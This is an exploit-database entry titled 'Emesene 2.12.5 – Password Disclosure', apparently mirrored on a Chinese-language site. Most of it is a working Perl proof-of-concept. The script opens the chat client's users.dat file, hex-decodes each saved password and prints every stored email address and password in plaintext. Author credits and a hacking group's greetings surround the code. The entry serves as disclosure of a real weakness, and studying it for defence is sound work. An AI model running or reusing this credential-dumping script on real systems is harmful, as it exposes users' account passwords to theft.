Emesene 2.12.5 – Password Disclosure

• Exploit Database
• 14 阅读

• 作者： Daniel Godoy
  日期： 2012-07-01
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/19517/

•  # Exploit Title: Emesene Password Disclosure
  # Category: Local
  # Date: 29/06/2012
  # Author: Daniel Godoy
  # Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
  # Author Web: www.delincuentedigital.com.ar
  # Sofware web: http://blog.emesene.org/p/downloads.html
  # Tested on: Linux
  
  The only requirement to run the script is that the customer is
  highlighted remember password.
  
  [Comment]
  Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,
  Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
  InyeXion, ksha, zerial,LinuxFer, Scorp
  her0, r0dr1 y demas user de RemoteExecution
  www.remoteexecution.info www.remoteexcution.com.ar
  #RemoteExecution Hacking Group
  
  [PoC]
  
  #!/usr/bin/perl
  #/home/$HOME/.config/emesene1.0
  system("clear");
  print "[ EMESENE PASSWORD DISCLOSURE ]\n";
  print "TESTED ON UBUNTU 10.04 LTS\n";
  my $pwn="users.dat";
  open (ENTRADA,"<$pwn") || die "ERROR: No puedo abrir el fichero $pwn\n";
  $cantidad++ while <ENTRADA>;
  close (ENTRADA);
  open (ENTRADA,"<$pwn") || die "ERROR: No puedo abrir el fichero $pwn\n";
  @source = <ENTRADA>;
  for($i = 0; $i < $cantidad; $i++)
  {
  @password= split(":", $source[$i]);
  print "Mail: ".$password[0]." Password PWND! => ";
  print pack("H*", $password[1]), "\n"; 
  }
  close (ENTRADA);
  
  -------------------------
  Correo enviado por medio de MailMonstruo - www.mailmonstruo.com